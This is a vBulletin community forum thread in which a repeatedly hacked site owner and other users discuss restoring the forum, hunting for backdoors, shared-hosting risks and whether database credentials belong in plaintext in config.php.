Probably 10th time in 4 years, my forum has been hacked. This time Turkish hackers inserted "class.php" into the /includes directory, my provider (Webhostinghub) is adamant they came through some VB backdoor, which I doubt.

VB 4.2.3 all vanilla, no Mods.
Passwords for site and ftp different, 30-40 characters, free form text with blanks, uppercase, numbers.

Wiped the site out and restored from last good known backup.

All VB files are in ./public_html/forums, as in picture 1

Now it is showing bare index, as in picture 2.

When going into "forum", it does show the site is down and under maintenance.
But if anyone clicks on the pictures, it is free to look at them with no login.
(I have moved pictures to another directory since until this is resolved but picture 4 shows how it was).

Why is it going now into bare index not into the full site?

Did you look under diagnostics to see what files are left and check your plug ins as well..

--------------- Added 1441693369 at 1441693369 ---------------

If you were hacked many times then chances are they did leave a "door" on your site which was never patched.

I wiped out the site, removed directories and created them afresh this morning.

Maintenance - diagnostics shows nothing strange.
The site is vanilla, no plugins, nothing that did not come with VB.

Hacking my site is rather like farming web services users hosted by that provider, using them as bots. Wells Fargo sent me once to stop spamming from my site.

Only 2 out of 10 times they shut down the site with some message.

Sounds like you have a ton of stuff on there still Go under maintenance and run the diagnostics. Check your plug ins as well.

I really do not know what you mean by you wiped everything out. you reinstalled Vbulletin fresh or just uploaded clean files? In that case you did not overwrite the hacked files which may not only have been Vbulletin.

There are many things you need to do even after you clean this to make sure it is secure but it looks like you have a long ways to go.

This is what it was:
.htaccess file was not in the root directory. After blasting the entire installation, it of course, did not come there from VB install. Dragged it from backup and all fine.

That file contains redirection to the home page, without it it defaults to bare index.

Ok good. You installed a fresh copy of Vbulletin? I am a little confused but glad it is working anyways. :)

Honestly, I don't know what is different this time. If the hacker who broke in yesterday is pleased to do again today, the same hole would be ready for him.

Whether they come through cPanel, site itself or through VB, nothing has changed, even if VB is fresh install. The hosting site said it was not through ftp. They also said password was not used to get in, how they know, through their logs probably.

Are you on shared hosting? That is the most common way that hackers get in and it IS the hosts fault in most cases NOT vBulletin if its a fresh install with no mods added on. Shared hosting is famous for not being very secure. I suggest if you are that you either change hosts or get a VPS instead where you can control the security.

Yes, possible.
Yes again, shared hosting, it may well be their problem. As I said, seems the hackers waltz in and farm the users and their sites without apparent problem with their sites. They (webhostinghub.com) applied some measures that alert me when (some, what their poor security can detect) it happens. They quarantine the malicious code but still - it comes through their lack of security.

Issues like this have a potential to drive a hosting company out of business.

If any, the luck is my site is not commercial, no money loss. But hours lost to restore by me for someone who had ruined my site for fun.

When I asked webhostinghub.com why don't they introduce 2 level login (with RSA dongle) they said it could fix cPanel only but not "3rd Party software", possibly implying VBulletin to be at fault.
They confirmed nobody had compromised my passwords and logged in.

I still believe it is cPanel, an independent vendor, who is at fault.
No offers for help (paid) from this site would fix it. It is not VB, I think.

Well it could be hosting but my guess is that it is something you have missed.

Did you delete all the files on your server and reinstall fresh? Did you run the diagnostics to look for third party files?

Have you been with this same host all the other times you were hacked?

Yes, possible.
Yes again, shared hosting, it may well be their problem. As I said, seems the hackers waltz in and farm the users and their sites without apparent problem with their sites. They (webhostinghub.com) applied some measures that alert me when (some, what their poor security can detect) it happens. They quarantine the malicious code but still - it comes through their lack of security.

Issues like this have a potential to drive a hosting company out of business.

If any, the luck is my site is not commercial, no money loss. But hours lost to restore by me for someone who had ruined my site for fun.

When I asked webhostinghub.com why don't they introduce 2 level login (with RSA dongle) they said it could fix cPanel only but not "3rd Party software", possibly implying VBulletin to be at fault.
They confirmed nobody had compromised my passwords and logged in.

I still believe it is cPanel, an independent vendor, who is at fault.
No offers for help (paid) from this site would fix it. It is not VB, I think.

Always try to have frequent backups. But I'm guessing you have already got that under control. Has the hosting company upgraded cPanel lately? Do you know? I know mine upgraded my cPanel WHM within the last month or two, so possibly its an old version. No idea.

Well it could be hosting but my guess is that it is something you have missed.

Did you delete all the files on your server and reinstall fresh? Did you run the diagnostics to look for third party files?

Have you been with this same host all the other times you were hacked?

Yeah all good questions in trying to find the issue. Also are you sure that there is no portion of the hack in the vBulletin database itself? Since you keep on getting the same thing, that maybe possible as well.

Whole this business is Mickey Mouse, I am not surprised it gets hacked, the surprise is it has ever worked at all.

The hosting company upgraded cPanel (another mickeymousepieceofsh1t) 2 months ago.

The day I changed my password into free text and as guessable as "Walked d0wn the str1t and heard d0g fart while black dog humped the white 0ne" they sprayed me with banners like "Hackers can guess your password and (must click): Accept the risk: Yes No".

That tells how helpless they are.

Should I change the provider? I could, just to see that new one is as clueless as the previous.

Well we still do not know for sure it is your server. You have not answered my questions.

#1 - Did you wipe all the files off the server and resinstall Vbulletin fresh?

#2 - Did you run diagnostics and check for files that do not belong? Did you check those files and look for debase64 code?

#3 - Did you go into the plug in manager and look for plug ins that should not be there?

Trivialities like that were done even before I posted here.

Whole root directory "rm -r", wiped out
Fresh install of VB 4.2.3
There are no plugins, all vanilla
Maintenance-Diagnostics shows nothing that should not be there

And then, I asked here why is it not going into the Forum home page and you went around and around (oferring paid service via PM) instead of (if you knew it) telling me there is
.htaccess
file missing and that does not come with fresh install.

Ok so the folders and files were restored from your backup... was this a complete backup meaning - Did it contain the folders, files, AND all databases?

- If you restored the folders and files only, then the hacker apparently altered your database.
-- The reason we would speculate this to be the cause is; You stated you completely wiped the root directory therefor uploading 100% fresh files did not fix this. per your screenshot so one would be safe to assume (despite the saying regarding that lol) that they altered your actual database. I myself have seen sites where they altered all files and also inserted their webtemplate w/ all the hacker info and silly rubbish into all templates in the style, every single template so more than you think is going on here, could quite possibly be going on you never know until you really dig into it.
**Be careful wiping all files, most owners store their attachments in the actual filesystem and by simply deleting all "possibly" infected files you would in-turn be deleting all attachments - ACK! So always check settings first before blindly deleting folders and files. I would have moved all the contents of the forums root into a new folder, CHMOD it 000 to prevent anything from running that way if attachments were stored that way you could check and clean them later if need be then simply CHMOD back to correct permissions and restore the files to the correct location.

-If you restored a complete backup including all folders, files, and databases then something else must be "up" or wrong. They may or may not have uploaded a shell script or similar such as c99 madshell (http://www.derekfountain.org/security_c99madshell.php)or a variant and went about modifying what they could and wanted to regarding the actual server.
-- Yes, a hacker can gain access to one site on a shared server and from there gain access to others, its not the hardest thing to do and happens all the time when people do not keep software up-to-date in regards to security and exploits. If your site is a VPS/Dedicated they can still modify the server to a certain degree if they have a shell script in place, of course depending on the sophistication of the script being used.

Check on vBulletin.com for posts and blog posts by myself and Zachery - we have useful info and queries to run that help you look for such things. Edit: Two links I included in my next post following this one.

.htaccess
file missing and that does not come with fresh install.

It does however its located in the do_not_upload folder, despite the folders name you do actually upload one of the .htaccess files in said sub-folders depending on your setup. So yes upon initial installation its not there, now lets say someone wanted to use Mod Rewrite Friendly URL's instead of the basic ones, they would have upon installation uploaded the .htaccess file required to make mod rewrite friendly URL's work in vBulletin.

So this may or may not simply be a case of a missing .htaccess file, also yes removal of or changes to an .htaccess file can make the site display wonky as if the formatting is off. Also bear in mind that over the course of a ten year span with being hacked upwards of four times... the settings and such despite it being vanilla in regards to modifications could still have template edits or other changes made internally that do not show nor are reflected in the actual files. So a call to a site or a file inserted into a template could be your backdoor here as well, I'd go through the database and use the queries in our blog posts to see if anything comes up.

Edit: Here are two links, backup your database if not already before doing anything;
http://www.vbulletin.com/forum/blogs/zachery/3993888-fixing-your-site-after-you-have-been-hacked
http://www.vbulletin.com/forum/articles/community-tutorials/4023667-recovering-a-hacked-vbulletin-site

Edit yet again! Per your second screenshot, looks as if you had the CMS setup in the root folder, and all the forum files uploaded to /forums/ so make sure you do the same setup again if that was the case. If a pertinent file is missing such as index.php (and nothing else such as an index.html file exist) then it has no way to render a missing file and will therefor list the contents of the directory. Basically to sum it up, servers are typically setup to look in a certain order for important files or well I should phrase it "looks for commonly known files such as index.php and index.html index.aspx or similar as they render content to browsers", usually it looks for index.php first then looks for index.html which by the way can be changed i.e. the order but in your case seems as if some files were not uploaded properly after restoring.
*****Just make sure you grasp that, you had setup the CMS in the root and the forums into /forums/ then read the info on how to setup the CMS in root and forums in a folder (http://www.vbulletin.com/vbcms/content.php/295-FAQ-How-to-install-CMS-in-Root-Forums-in-subdirectory) and ensure its all done correct and you *should* be back to normal unless of course like I initially suspected and the hacker modified the actual database.

I just stepped up to Surcuri's cloud proxy firewall. After the 5th time I have been hacked.

Yeah my thought was after all files had been deleted the only thing left is something put into the database. I've seen client sites that were hacked not only in the physical files but they also somehow gained access into the admin panel and put some weird non-vb stuff in the templates mainly calling their hack into the site instead of your regular vBulletin front page or other pages. Then if you make a full backup of your database after that hack happens its still lodged in there and you restore and voila the hacker is back. This is definitely something you should check when trying to completely rid yourself of the hack and get your site back on track. The thing here is if this is in your database then even if you switch hosts the hack will follow you. So there are some things that you really need to check out first before decided to make a move to a new hosts.

Not too long ago there was a hacker that went around gaining access to vB web sites via this kind of hack. They would upload files on the site and put stuff in the templates. To know if you had this kind of hack was pretty simple. You all of a sudden out of nowhere had a newly registered member that was an admin and had access to your ACP and there were admins other than the ones you had in place logging into the panel. Simply deleting their account and deleting the physical files did not kill the hack because they had put some hacker code into random templates.

Now if that is not the case and you do not remember deleting any random weird rogue admin accounts then as others have said its possible there is something else going on or the hack is elsewhere. Its best to make 100% sure that if you switch hosts that this hack is not lurking about in your database before preceding. :)

Thank you,
The hacked directory (root and subdirectories) were saved by the provider as soon as I requested them to down the site (it was displaying hackers' message and I could not get into admin to shut it down).

Just went in and chmod to 000 what they saved, thanks for that. Poking around the site there is nothing visibly wrong.

If a file or directory are touched, it shows the timestamp that sticks out when the directories are listed.
Several times I saw things like "maill.php" that was inserted without harming the site contents.

Indeed, as I am on the shared server, could be 100s of sites hosted on one physical machine.
However disciplined I might be, a slacky site owner on the server may invite a trouble for all ?

Is there some tool to check the database? The cPanel provided by webhostinghub.com has "database repair" and it ran cleanly.

--------------- Added 1441775800 at 1441775800 ---------------

Just remembered. In

./includes/config.php

there is hardcoded database name and password, in plain sight, unencripted

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'dbname_admin';
$config['MasterServer']['password'] = 'unencripted_password';

Is that how it should be? Never seen that in my life.

Most webscripts store config data in plain text, under normal conditions users cant view/use them.
If a hacker has access to the files of your script it doesnt matter if the data is encrypted or not, he can get it by decrypting them (unless its one-way-encryption).

As for the DB, you have to check it manually if its ok (or send it to an expert here), the "repair" functions that the DB or Hostings offer are to fix damaged tables or db's, not to removed unwanted elements.

Just remembered. In

./includes/config.php

there is hardcoded database name and password, in plain sight, unencripted

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'dbname_admin';
$config['MasterServer']['password'] = 'unencripted_password';

Is that how it should be? Never seen that in my life.

That's normal because you should have an .htaccess or equivalent that denies access to files within the includes directory. Where else would you store it? You can't store it in the db because you need the db username and password to access the db.

As for the DB, you have to check it manually if its ok (or send it to an expert here), the "repair" functions that the DB or Hostings offer are to fix damaged tables or db's, not to removed unwanted elements.

What experts? Those telling me that plain password in ascii file is normal?
And what after "experts" have checked the db? A hacker capable of getting into my site would just have to go and copy/paste DB admin user name and password offered on a plate.

For decades Unix has /etc/passwd and /etc/shadow files where encrypted passwords are stored.

That is why you should protect files via .htaccess

.htaccess does not come with vanilla install.

People off the street would not know what it is but would know that plain text passwords are bad idea.

Ridiculous: it is like saying that your house will be broken into one way or another if someone really wants to do that so no need to lock it up.

The same could be said for people having to be told to put locks on their houses. Bottom line is do your research.

But I seriously doubt that is why you have been hacked so many times. If that was the case, this site, van.com as well as millions of other site would be hit as often as yours, if not on a daily basis.

There are 100s of VB sites hacked daily, the most hacked product in board software history is exactly VB 4. My hosting provider could be targeted and vulnerable, I came just a s a run off the mill together with other sites. Once there, they have plain text DB admin user and password.

What research should I do and why? I bought a product that should work like a fridge, without researching anything about it.

Oponents of VB would have a field day reading what "experts" here are advocating.

Oponents of VB would have a field day reading what "experts" here are advocating.

Which is nothing. We're simply trying to steer you in the right direction i.e. cleanup so your site is back to normal.

Go ahead, visit your site and type in the path to the config file, lets use vbulletin.org as an example: https://vborg.vbsupport.ru/includes/config.php

Even if there was no .htaccess protection, based on how the site serves content you could not download the file as it sits on the server, only save a copy of the file after its rendered therefor you cannot know the files content (original contents i.e. code only what is parsed afterwards).

Another example from http://www.thebiggestboards.com/vbulletin-forums.php would be ConceptArt.org so go ahead, visit this url then download the config.php (http://www.conceptart.org/forums/includes/config.php) file or however you would go about it... now tell us all the database username and password - I'll be waiting.

Long story short, I would be waiting a very long time. You seem to know a little based on what you've spent time researching but clearly do not know what you're talking about no offense intended just simple fact - I applaud your effort don't get me wrong, I wish half those I dealt with would take the time to do the research you did and I can explain all this to you above ^ but I can't understand it for you. I need you to take more time and do more research before speaking like you did above, I tell you this because I would want someone to tell me if a booger was hanging out my nose instead of letting me walk into a crowded room and speak highly about a subject while not knowing how I looked to others.

Remember if you need clarification on something just ask but being sore over a hacked site because you feel something is wrong with the software when you do not understand it, is not the way to go about things.

Edit: I assume you've already added a new user to the database with all privileges then removed the old user and updated the config.php file? If not please do so, the hacker more than likely knows your database details now since he hacked you - if you left these the same after the first time you were hacked then its no surprise he/she hacked you again.

It doesn't work that way. A website is not a "Fridge". It requires updates and care and maintenance.

I would be willing to bet that you really only got hacked once from failure to do a patch or something like that and you just never fixed it correctly. Now they can come and go as they wish.

I have had vbulletin sites for years and only got hacked once many, many years ago when I did not know what I was doing. Keep up to date, be careful with your plug ins and file permissions and take some precautions and you will be less likely to get hacked.

--------------- Added 09 Sep 2015 at 23:33 ---------------

I would be interested in knowing what version got hacked originally.

--------------- Added 09 Sep 2015 at 23:35 ---------------

Also, what are you talking about "plain test passwords"? Passwords are not stored anywhere as text.##OK, I see you are talking about the file system. Every script I have used, wordpress, joomla and countless others have a config file with this information. That file should never be seen by anyone unless using ftp and if a hacker already is that far than you have already been hacked.

--------------- Added 09 Sep 2015 at 23:36 ---------------

Thank you,
The hacked directory (root and subdirectories) were saved by the provider as soon as I requested them to down the site (it was displaying hackers' message and I could not get into admin to shut it down).

Just went in and chmod to 000 what they saved, thanks for that. Poking around the site there is nothing visibly wrong.

If a file or directory are touched, it shows the timestamp that sticks out when the directories are listed.
Several times I saw things like "maill.php" that was inserted without harming the site contents.

Indeed, as I am on the shared server, could be 100s of sites hosted on one physical machine.
However disciplined I might be, a slacky site owner on the server may invite a trouble for all ?

Is there some tool to check the database? The cPanel provided by webhostinghub.com has "database repair" and it ran cleanly.

--------------- Added 09 Sep 2015 at 01:16 ---------------

Just remembered. In

./includes/config.php

there is hardcoded database name and password, in plain sight, unencripted

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'dbname_admin';
$config['MasterServer']['password'] = 'unencripted_password';

Is that how it should be? Never seen that in my life.

Nobody should ever be able to see that if your file permissions are correct. If you can see that in plain site you have a problem with your file permissions. Most files should be at 644.

This debate is ridicoulous. Every webscript I have ever used has database credentials in plain text in a config file. There's just no other way to do it, since the script has to be able to access this information. Of course you could encrypt it, but since the script needs to be able to decrypt it again to use it, you'd have to store the key somewhere. As others have pointed out, the config file can't be accessed from the outside. If an attacker has access to your ftp or shell, it's really too late.

My site is back to normal, has been since first 3-4 posts here and without anyone's help.
- File permissions are 644, directories 755.
- Originally it was 4.1 hacked in 2010. That was before warning "remove install directory" was issued, even specialist installation by VB staff left it onsite. Site re-provisioned.
- Months of experimenting with the site, Mods, plugins, messing...wiped the site and got another specialist installation (May 2011, Jake Bunce did it).
- over years, 6 times found (using Maintenance - Diagnostics) .php files that are not part of VB, a glance through and they seemed to be spam mailers.
- 2 times webhostinghub.com located and quarantined spam mailers (since they upgraded their software 3 months ago)
- 1 time found (last week) a file "class.php" in the includes directory
- on Monday the site was hacked and taken down

Keep on changing passwords into 40 characters long, spaces, mixed letters.

Daily run of Diagnostics. Daily backups.

--------------- Added 1441871454 at 1441871454 ---------------

This debate is ridicoulous. Every webscript I have ever used has database credentials in plain text in a config file. There's just no other way to do it, since the script has to be able to access this information. Of course you could encrypt it, but since the script needs to be able to decrypt it again to use it, you'd have to store the key somewhere. As others have pointed out, the config file can't be accessed from the outside. If an attacker has access to your ftp or shell, it's really too late.

Let's see why this debate is ridiculous: because coders and VB staff participating here have not told us (may well be news to them) that plain text database admin user name and password in

/includes/config.php

are used when initially creating the database from the sheet supplied for paid install or from own notes. Some may stay with that password, most would change it.

Just changed my cPanel, mail and database passwords and in

/includes/config.php

the password is the same as it was upon creation, should not be valid. But the site does not care.

That is another question: why is it then in /includes, why not in /install and removed before the site is powered up?

Let's see why this debate is ridiculous: because coders and VB staff participating here have not told us (may well be news to them) that plain text database admin user name and password in

/includes/config.php

are used when initially creating the database from the sheet supplied for paid install or from own notes. Some may stay with that password, most would change it.
So - now you're accusing vB staff of hacking your board? That's ridiculous. Believe me, all of your discoveries are nothing new to anyone here. Every single customer who has read the installation instructions and installed vB knows config.php and it's contents, because everyone has edited it themselves. Also, everyone who has only the slightest clue of web development knows that and why you need such files.

Just changed my cPanel, mail and database passwords and in

/includes/config.php

the password is the same as it was upon creation, should not be valid. But the site does not care
Then you did not change the password of the database vB uses. Period. If you change the database password, and do not edit it in config.php accordingly, the site will stop working and throw database errors. Just give it a try. Change your password in config.php to something random, and your site will break immediately.

That is another question: why is it then in /includes, why not in /install and removed before the site is powered up?
Because, as any other webscript, vB requires certain basic access data in order to work. If you remove config.php, your site will break. Again: Just try it. Delete (or better: rename) config.php. Your site will break immediately.

You're lashing out at everyone and everything here, making wild accusations, yet obviously having only very limited knowledge of what you're talking about.

It's sad that you have been hacked numerous times, but it will not help you at all if you're pointing at a perfectly normal file with perfectly normal contents.

You really need to understand this: If someone is able to read the contents of your config.php, you already have been hacked. It's too late.

Step back, calm down, breath through. There's people here trying to help you, and you're lashing out at them in a way that is really not called for.

True, renaming config.php stopped the site.

Then, my provider is telling me what is either not true or I don't understand

You have changed password for

ftp
mysql
mail

Sorry if I have left that taste of lashing on everyone, my apologies.

Its ok loua you're frustrated, we understand and we really just want you to understand so its easier on you despite some of our comments always take them with a grain of salt my friend :D.

- Think of it this way, yes you're right its stored right there in the file but how can they get to it using my example above? If anyone could simply download that file hackers would be taking down sites by the second, most software vBulletin, IPB, even free phpBB forums, Wordpress, the lot of them all use some form of configuration file where the details are stored.

Regarding your issue: Yes, if you went into cpanel and changed the database users password, then nothing "automatically" changed it everywhere else for you :( so with that being said hurry and edit config.php with the new password and it should come right back up :). Also you cannot simply rename config.php to another name unless you make other file edits, best to leave it as-is unless testing as Cell mentioned above. One other thing to mention is, whomever setup the forum initially had to manually rename config.php.new to config.php, then edit the file and enter in your database name, username, and password to the database so that is why most of us were shocked by your statements - we just couldn't figure out why this was just now surprising you... I see where you were coming from, sure its thinkable but glad we steered you in the right direction!

Without knowing what exactly you asked your provider, what you did in cpanel, and what exactly their answer was we really can't comment properly. No offense, but from the course of this thread I tend to believe that there may be some misunderstandings on your part.

It really seems your site (including the database, not only the files!) was never properly scanned for hidden backdoors etc. after the first attack. As others have speculated, I would assume that all those attacks may be follow-ups. Whatever your password, however secure, if there's some sort of backdoor present, it won't help you (since they don't have to get in, they are already in - all the time). But all of this has nothing to do with config.php, really.

the only one time i got hacked was because i used a malicious ftp client

use only filezilla downloaded from their official site

could also be a password stealer or other types of malware on your computer

do you use cracked apps or games downloaded from p2p sites? obviously you'll answer you don't but for the record they're almost always infected with malware

the only one time i got hacked was because i used a malicious ftp client

use only filezilla downloaded from their official site

could also be a password stealer or other types of malware on your computer

do you use cracked apps or games downloaded from p2p sites? obviously you'll answer you don't but for the record they're almost always infected with malware

I'm sorry but this has nothing to do with a FTP client. There are many clients that work just fine. I use FlashFXP and have used it for 15 years and NEVER had the FTP client cause an issue elsewhere on ANY server. Whatever you downloaded and installed may have had a virus in it but I would imagine it would effect your PC although I do not doubt its possible to somehow infect your server I think that it is not really probable that this is a FTP client issue for the OP.

Also cracked programs have nothing to do with what the OP is talking about. I'm not really sure where you are going here.

That's normal because you should have an .htaccess or equivalent that denies access to files within the includes directory. Where else would you store it? You can't store it in the db because you need the db username and password to access the db.You missed his point which is the password isn't crypted.

Also cracked programs have nothing to do with what the OP is talking about. I'm not really sure where you are going here.you don't see how malwares such as password stealers could have caused op problems? well....

You missed his point which is the password isn't crypted.

Not really you missed that point that if the file is not accessible the password within the file does not need to be encrypted because no one can access it to see it. You only need to encrypt things if you don't want others who are looking at it to be able to see what it is. Since no one can look at it, in a properly configured setup, why would it be encrypted as all that does is add unneeded overhead to every single page view.

--------------- Added 1441914930 at 1441914930 ---------------

That is another question: why is it then in /includes, why not in /install and removed before the site is powered up?

Because for every action on the site, whether its to login, view a page, create a thread, make a post, all require db access, which requires the credentials (username, passoword) so the credentials need to be accessible.

Not really you missed that point that if the file is not accessible the password within the file does not need to be encrypted because no one can access it to see it. You only need to encrypt things if you don't want others who are looking at it to be able to see what it is. Since no one can look at it, in a properly configured setup, why would it be encrypted as all that does is add unneeded overhead to every single page view.

I guess you don't know much about security

why do you think htaccess encrypts passwords? just for teh phun?

not using encrypted passwords means that if the ftp is compromised then the database is automatically compromised as well, it wouldn't be the case with encrypted password, think before you type something really stupid

the only reason i can see for vbulletin to not use encrypted passwords is for customer convenience, but convenience is often the worst enemy of security

Do you know about security?

htaccess doesnt encrypt passwords, its just a file with some rules in it.
It can use them using htpasswd.

not using encrypted passwords means that if the ftp is compromised then the database is automatically compromised as well, it wouldn't be the case with encrypted password, think before you type something really stupid
If you read some posts before you should know that if a hacker has access to your webspace / shell / hosting panel etc. plain text files are your least problem.
Even if you would encrypt the content, it has to be decrypted to make use of it. So can the hacker, since he can find the algorithm used in the files.

And as said here, most, if not all scripts (Forum, Chat, CMS, Blog etc.) that use a database store their config data plain text in files, so its not "vB only" problem.

:facepalm:

Okay so let's just sum up the ways how this could of happened:
- Someone got root access on the shared server and decided to mess up a bunch of sites.
- Someone found a malicious vBulletin plugin (or a backdoored plugin) and abused this to gain access to execute commands.
- OP had his FTP/CPanel information stolen somehow. (Which is not likely unless OP has a virus/malware.)

Also even if they had access to the database information, they can't do anything with it unless: the host has a public listening MySQL server, a public reachable PHPMyAdmin installation or if they had access to creating PHP files.

Were the access logs checked by the way?

Regardless, my advice is to move host asap.
Once you lose trust in your host, you should save yourself the trouble and move.

^ I've reviewed his reviews on exploits and other via his blog so head his advice, Dave actually knows his stuff. The rest of you geesh, argue your rears off within reason :p.

That would be a good call, Dave does know his security stuff. :)

I don't really care about your advice although I appreciate your time to chip in.

It came before: the product, vBulletin has to be a product serviceable by a user. Not by the boffins.

That is why I bought it. But appears not to be the case.

The trivialities recommended here are laughable, all the advice. Furthermore, so called "Experts" advocating open text paswords, is it not a degeneration of the humanity?

Anyone off the street could tell you open text password is a stupidity, still, here, VB coders and developers are scolding me for sayin just that.

BTW, my humble site is working well, after I have reinstalled it and not listened to anything said in this tread.

Until someone is pleased to hack it.

If you don't want people's advice, then why post? You seem to know it all, so no need to waste people's time replying to you when you tell them you don't care about the advice given.

I guess you know better than all of us who have been using it for years. Good luck.

I guess you know better than all of us who have been using it for years. Good luck.

Not really.
But I bought a product that goes a victim to anyone who wants to hack it.
Just when they want.

Then I need someone (outside of vB) to help me. That is not a product, that is rubbish.

Still talking VB4. Not VB 5.

If that was the case, every vB site in the web would be hacked, not just yours.

And they are, the world over, every day.

Those who don't know what to say, retreat to Database injections.

Really, how could that happen? It might, but the database is not vBs property, neither mine on the my site provider.
Is it a mystery that covers up blatant security holes within the vB? Like by vB coders and developers much loved open for all plain data base password?

What they might not know, entering the SQL code of the providers' database would affect not only one site. That could have happened to me and I don't know about others.
Hence your advice (if you have guts, go back and read them) were useless.

Wow,

If you installed correctly and updated when exploits were found you would have never had an issue. Even windows gets updated because exploits are found every so often.

It is a website and it is complex. There is always a learning curve but if you do not want to learn from those who know it well then good lucking finding your magic script that doesn't exist.

My site has been up since 2004 and has never had a successful "injection" attack. I have clients that have sites that go back further and have never been hacked.

At any rate, the people here have taken the time to try to share knowledge with you. Perhaps a thank you would have been a better reply and yes, your site may be running but if you did not fix the issue than I am sure it will be hacked again. All it takes with any website is one wrong move like a file permission and it is all over.

Don't waste your time on the in help able.

Amazing how amateurish and trivial advice were here. About a poor quality software that sits atop something that is a a science for them, somebody else's database.
Then, they started exploring the mysteries beyond their reach, told (vB staff did that) to the customer he has a bugger in his nose, ridiculed and did nothing.

Other than welcoming even less introduced boiler-room vultures.

Instead, a good product would have never needed them nor any discussion. Not even this site.
It would, simply, work.

Wow, just wow. SMH.

Since the OP is no longer looking for advice, now is probably a good time to just close this thread.

Amazing how amateurish and trivial advice were here.
The only amazing thing here your attitude. :rolleyes:

Since you clearly know far better than everyone else, feel free never to ask for any advice here again.

I would close this, but it seems Lynne beat me too it.